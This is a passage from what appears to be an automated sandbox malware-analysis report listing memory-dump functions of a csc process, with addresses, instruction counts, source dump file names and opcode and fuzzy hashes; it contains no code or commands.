                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 95ec70ebcf0f7f9fef41da53eceb6c5301a8610e90356efd06745aa0c42cd743
                                                                                                                                                                                                                                                                                  • Instruction ID: a8ff98184144cb409d51359469d44b2a6379c1ea4b8df80f0318a2241e12e07c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95ec70ebcf0f7f9fef41da53eceb6c5301a8610e90356efd06745aa0c42cd743
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B513571A08341DFC724CF29C0D0A2AFBE6FB88608F144D6EE59997355DB30EA44CB92
                                                                                                                                                                                                                                                                                  Function 05C9B490 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 13a1f3a7d27f2c98705964dee786e2d057b6224bfcf4302d4c65a39223fbc290
                                                                                                                                                                                                                                                                                  • Instruction ID: 855749132b2cb2f79fcedf5685a3baac43695fe07f9d32babb6469836b85b217
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13a1f3a7d27f2c98705964dee786e2d057b6224bfcf4302d4c65a39223fbc290
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351D671604341EBD720EF65DC88F6BBBE8EB45728F100E2EF91697291DB309940D7A2
                                                                                                                                                                                                                                                                                  Function 05C894FA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: d6e28c0571c3bc7c0fddd974137c0dabedf70d44d13a0c813c8f7800478cb14d
                                                                                                                                                                                                                                                                                  • Instruction ID: 964f18bba77a7226327a0d97539dcf3e87656b6dc9f62b7633504649f33b5c56
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6e28c0571c3bc7c0fddd974137c0dabedf70d44d13a0c813c8f7800478cb14d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E51AF71A04249AFDB21EFA5CC84BFDBBB5FF05304F20097AE596A7250DB719A44EB10
                                                                                                                                                                                                                                                                                  Function 05C73660 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fbed5f166a314cec40a81fbecca67fec51d28b9646b2c3a3ef6f18933011bd16
                                                                                                                                                                                                                                                                                  • Instruction ID: 0ec5eac0f65d624ff80024d637321f362fde3bb3a6e3da03fbfa7dcb7cea18a2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbed5f166a314cec40a81fbecca67fec51d28b9646b2c3a3ef6f18933011bd16
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C5133B5A1069AAFC711CF6CC584A69B7B1FF04B10F048EA5E845CBB40E734EA81DBC0
                                                                                                                                                                                                                                                                                  Function 05C844D1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                                                                                                                                                                                                  • Instruction ID: 2af7b39b81b872f38a1446dcac038abac5ae73d995257e1979fa067981f3e33c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA519171E0420AABCF15EF94C495BBEBBB5EF4471CF04856AE901AB240D774DE45CBA0
                                                                                                                                                                                                                                                                                  Function 05D286A8 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: cd52b48260a870546d474091e55b4d7c939359d70a3bbd440a60a99f746e0379
                                                                                                                                                                                                                                                                                  • Instruction ID: d2a8c9aef7fd59af0567d54974bcb2640c6fe72e81c3719d201d2f7ac851c166
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd52b48260a870546d474091e55b4d7c939359d70a3bbd440a60a99f746e0379
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141F6317047709BD725DA29C894F7BF79AFFA0668F04821BE81697780DB74D801E6A1
                                                                                                                                                                                                                                                                                  Function 05C6510D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e6df0f345ea8a6217d8a8824f00bc538b3beb1decfc1f4e7245d563d6566943b
                                                                                                                                                                                                                                                                                  • Instruction ID: 05c8b27cf1e19511d5299a82c47e76db5257d935b7d1f241f20f2d1e725f5267
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6df0f345ea8a6217d8a8824f00bc538b3beb1decfc1f4e7245d563d6566943b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89517AB1B05215DFEF21CBA9C888BAEB7B5BB08354F640819E801FB250E774EB40CB55
                                                                                                                                                                                                                                                                                  Function 05D2A553 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                                                                                                                  • Instruction ID: 879a986bbb40bf43a49ec668859be34dd8f2b58ec786fc22269eb962cba43644
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A941D7727047269FC725DF24C884A6BB7AAFF94218B05892FE9528B644EB70ED14C7D0
                                                                                                                                                                                                                                                                                  Function 05D33157 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                                                                                  • Instruction ID: 0cc8c6f4f6cc1dc96fd9452724f9a6a3e22be9b007cfd7df9e23cdc9d80a40a9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12519C71200606EFDB15CF54CA85E66FBB6FF45304F1489AAE8089F252E371EA85CB90
                                                                                                                                                                                                                                                                                  Function 05C6D454 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ebdcdcffa92d6829a29de8479774c1c41758efdde44e474ca4db6f19012cefe7
                                                                                                                                                                                                                                                                                  • Instruction ID: 8e82d6171228c4e9ccd2ecacad121aa498e9ec508f21f5f0597182369a361485
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebdcdcffa92d6829a29de8479774c1c41758efdde44e474ca4db6f19012cefe7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D5190717186918FC722CB19D884F7A77E6FB44B50F094DA8E8138B6A1D738DE40DB61
                                                                                                                                                                                                                                                                                  Function 05C90118 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: a696cf864d63df33dc2a72f4af508eaab3b69e84a655e8ca9018430e2c3b98a7
                                                                                                                                                                                                                                                                                  • Instruction ID: 21c21dd75c1bedbd71a296eb0fcc41dd7b29f8858299303e097c1f440279a493
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a696cf864d63df33dc2a72f4af508eaab3b69e84a655e8ca9018430e2c3b98a7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0641B936A05618DBCF18CF98C448AEEF7B5BF48704F14896AE816F7250E735AD41CBA4
                                                                                                                                                                                                                                                                                  Function 05CA2670 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                                                                                                                                                                                                  • Instruction ID: 49f5025e67c8a5674be0e1dc9d59fa480b0ba2e300f6bad1f1602ee420688b7a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F514C75A00215CFCB14CF99C880AAEF7B2FF85714F2585A9D916E7390D731AE81CBA0
                                                                                                                                                                                                                                                                                  Function 05C5B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 445e04c0b06b5d31a228c0b2be47679d32e12bc702e412e1270be644147c9fb2
                                                                                                                                                                                                                                                                                  • Instruction ID: c361a39f6b39e8ce2566ff3032aefb018706f194ff1917d281c6dc6a4f7e3f81
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 445e04c0b06b5d31a228c0b2be47679d32e12bc702e412e1270be644147c9fb2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7541AF71640706EFDB25EFA9C849B6ABBF9EB00768F004C29E9029B650D7B4DE40DB50
                                                                                                                                                                                                                                                                                  Function 05D281EE Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                                                                  • Instruction ID: 7afad24b647f29fdf850843b08e86b6391817f4dcc739a2e82e4bc3b405a35df
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C41D671B00325ABDF14DF99C894AAFBBBAFF98604F54406AE805E7345D670DE01DBA0
                                                                                                                                                                                                                                                                                  Function 05C607A7 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: a411ec5dafd1123ff2ebc5ce843a4e1ac0060acd5c0bf1bbdb3b1d3b5cf8af80
                                                                                                                                                                                                                                                                                  • Instruction ID: 09609e8a4c8617ab9e2a4490547b617cfad812c39da2f8df2271aa7a65085b4d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a411ec5dafd1123ff2ebc5ce843a4e1ac0060acd5c0bf1bbdb3b1d3b5cf8af80
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4841B0B16047019FD728CF69C4C8A22B7FAFF48304B104E6EE457A7A51E770EA55CB90
                                                                                                                                                                                                                                                                                  Function 05C8D600 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: eb76efc14040103668d4c33b0b9d134d3662bab1526d3d2fdd36a4902fa7b39b
                                                                                                                                                                                                                                                                                  • Instruction ID: 1b0e7cd2215c823786ae64bb4656026c405131216b5d3c8448a3b56643974cf3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb76efc14040103668d4c33b0b9d134d3662bab1526d3d2fdd36a4902fa7b39b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E41E471604701DFD720EF29D888F6ABFAAFB45764F000A6EF91647291CB30E940DB92
                                                                                                                                                                                                                                                                                  Function 05C90630 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                                                                                                                                                                                                  • Instruction ID: b8eb3ad6a969aa8d594b5e0b92bfbf41b5287b2d369bbcb3ef67cff57ff87c5b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F414975A00705EFCB28CF99C988AAAB7F5FF48710B10496DE556E7650D730EA44CF50
                                                                                                                                                                                                                                                                                  Function 05D2D7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 0c760bd869a745a502f7ff6d0303ac5b8a25d0378870ba6459e267a9b3dcb207
                                                                                                                                                                                                                                                                                  • Instruction ID: b99d3768f034ad6faf45407a154ba966463beb301318499a873644e5029aa355
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c760bd869a745a502f7ff6d0303ac5b8a25d0378870ba6459e267a9b3dcb207
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41D2717083119BD325EF28C884B2ABBE6FBD4718F04456EE896C7781DA74D846C762
                                                                                                                                                                                                                                                                                  Function 05C6254C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 57456c4ab62d1bffaae4e0a987824a1f22904b8bbada450ec9475259772cb227
